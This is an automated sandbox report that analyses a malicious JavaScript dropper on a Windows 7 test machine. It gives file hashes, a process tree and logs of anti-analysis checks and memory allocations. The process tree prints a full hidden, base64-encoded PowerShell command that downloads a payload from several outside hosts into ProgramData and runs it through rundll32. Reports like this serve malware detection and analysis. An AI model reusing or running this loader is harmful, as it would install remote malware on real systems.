Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 16, 2023, 10:33 a.m.	May 16, 2023, 10:35 a.m.

Size	200.0KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`82c1abc36b66e14b3afb16c20661535e`
SHA256	`c0c714ab94454ddeb5c2ac32c9269ce490e94fd3eceb6d2689a050977288ed86`
CRC32	`6CFF8182`
ssdeep	`3072:+9tJrjz8vb39w6MNfTpcp3Gm7SZDTgFOrmV4Zr/:+DJrkvb39rMFTpCKTgFOrmOJ/`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Nzor.js
2052
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan
  2148
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA=="
    2296

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 10:33 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 16, 2023, 10:33 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b37a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b37a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b37a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b4020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b4020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b4020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b4020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b4020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b4020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b37a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b37a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b37a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b40e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b38e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 10:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b3ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 16, 2023, 10:33 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 134 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02931000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02932000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 16, 2023, 10:33 a.m.	process_identifier: 2296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
